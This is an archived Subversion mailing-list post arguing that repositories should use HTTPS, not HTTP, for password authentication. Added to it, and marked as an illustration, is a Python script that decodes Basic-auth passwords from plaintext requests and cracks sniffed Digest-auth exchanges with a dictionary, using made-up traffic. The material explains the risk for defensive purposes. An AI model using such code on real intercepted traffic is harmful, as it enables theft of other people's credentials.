
Re: Are http-based password authentications secure?

From: Nico Kadel-Garcia <nkadel_at_comcast.net>
Date: 2006-04-27 14:40:19 CEST

Mike.Brenner wrote:
> Hi Nico,
>
> Certainly none of those REQUIRE http.
>
> However, I take it that you grant Kalin's
> point that http "is useful" (read "as safe
> and faster") than https IN THOSE 3
> circumstances?

Those circumstances are so limited as to be useless. *SURE*, you don't much
need a seatbelt if you never leave your driveway. But just as soon as
someone needs access from off-site, or as soon as you're connecting via VPN
from someone's off-site location where the VPN client is not the Subversion
client itself, or as soon as some script kiddie gets access to your wireless
network because you're using WEP instead of WAP or are careless with your
WAP keys, you're toast.

> If you don't, I wonder how you recommend
> sending stuff to non-certificated people?

Usually with a self-signed certificate. Most clients will accept them
gracefully once you've accepted the certificate the first time: wget and the
command line svn are a bit annoying with the whinging about it, but it's
understandable with the security model that SSL was conceived for, which is
host authentication as well as end-to-end encryption.

> As a particular example, the website
> cvsdude sets up an svn server
> for you for $10 per month via
> http, or $30 per month via https.
> Do you recommend: always spend the extra
> $20 per month?

Look again. You're comparing apples to oranges: the difference between
$10/month and $22/month includes 5 times the disk space, 3 times the number
of accounts, WebSVN access, a private Bugzilla, etc., etc., etc.

CVSdude is an interesting service. But using HTTP vs. HTTPS for a public
site is so amazingly stupid that I cannot imagine what the company was
thinking.
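Nico's wireless-network scenario, carried through as an added example (this is not code from the thread or from the Subversion project): what a passive observer on the same network reconstructs from a Subversion client's plaintext http:// requests. The Basic case is the one the thread is about; the Digest case goes a step beyond the text to the other scheme Apache can front mod_dav_svn with, because it is the usual "but the password is hashed" objection. The PROPFIND traffic is constructed rather than captured, and the hostname, realm, nonce values, users and passwords are all made up.

```python
"""Decode what a passive observer learns from a Subversion client talking to
mod_dav_svn over plain http://.

Added example, not code from the original thread. All traffic below is
constructed for illustration: the host, realm, users and passwords are made up.
"""
import base64
import hashlib
import re
from typing import Iterable, Optional


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, qop: Optional[str] = None,
                    nc: Optional[str] = None, cnonce: Optional[str] = None) -> str:
    """RFC 2617 Digest 'response' value. The client computes it to log in; an
    attacker computes the same thing for each password guess."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop == "auth":
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


# Constructed: a Basic-auth PROPFIND exactly as it crosses the wire over http://.
# The base64 blob is "alice:Tr0ub4dor&3", a made-up credential.
BASIC_REQUEST = (
    "PROPFIND /svn/repo/trunk HTTP/1.1\r\n"
    "Host: svn.example.invalid\r\n"
    "Authorization: Basic YWxpY2U6VHIwdWI0ZG9yJjM=\r\n"
    "Depth: 0\r\n"
    "\r\n"
)

# Constructed: the same request under Digest auth (qop=auth). The response
# value is built with the formula above from the made-up password "hunter2".
_REALM, _URI = "Subversion repository", "/svn/repo/trunk"
_NONCE, _CNONCE, _NC = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "0a4f113b", "00000001"
_RESPONSE = digest_response("bob", _REALM, "hunter2", "PROPFIND", _URI,
                            _NONCE, "auth", _NC, _CNONCE)
DIGEST_REQUEST = (
    f"PROPFIND {_URI} HTTP/1.1\r\n"
    "Host: svn.example.invalid\r\n"
    f'Authorization: Digest username="bob", realm="{_REALM}", nonce="{_NONCE}", '
    f'uri="{_URI}", qop=auth, nc={_NC}, cnonce="{_CNONCE}", response="{_RESPONSE}"\r\n'
    "Depth: 0\r\n"
    "\r\n"
)


def parse_auth_header(raw_request: str) -> dict:
    """What a sniffer sees: the request line plus whatever the Authorization
    header gives away. Basic leaks the password outright; Digest leaks every
    input to the hash except the password."""
    request_line, _, rest = raw_request.partition("\r\n")
    method, uri, _ = request_line.split(" ", 2)
    headers = {}
    for line in rest.split("\r\n"):
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    scheme, _, params = headers.get("authorization", "").partition(" ")
    seen = {"scheme": scheme.lower() or None, "method": method, "uri": uri}
    if seen["scheme"] == "basic":
        user, _, password = base64.b64decode(params).decode().partition(":")
        seen.update(username=user, password=password)
    elif seen["scheme"] == "digest":
        # key="quoted value" or key=bare-token, comma separated
        for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params):
            seen[key] = quoted or bare
    return seen


def guess_digest_password(seen: dict, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on a sniffed Digest exchange: no further
    contact with the server is needed, MD5 is cheap, and the nonce does not
    help because the attacker feeds the observed one into the same formula."""
    for password in candidates:
        attempt = digest_response(seen["username"], seen["realm"], password,
                                  seen["method"], seen["uri"], seen["nonce"],
                                  seen.get("qop"), seen.get("nc"), seen.get("cnonce"))
        if attempt == seen["response"]:
            return password
    return None


if __name__ == "__main__":
    basic = parse_auth_header(BASIC_REQUEST)
    print("Basic  :", basic["username"], "/", basic["password"])
    digest = parse_auth_header(DIGEST_REQUEST)
    print("Digest :", digest["username"], "response=", digest["response"])
    print("Guessed:", guess_digest_password(digest, ["letmein", "hunter2", "password"]))
```

Over https:// the Authorization header, and the repository contents that follow it, travel inside the TLS session, so the observer in this scenario gets neither the Basic credential nor the Digest material to grind on; that is the whole of the "seatbelt" argument above.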

Received on Thu Apr 27 14:41:30 2006

This is an archived mail posted to the Subversion Users mailing list.
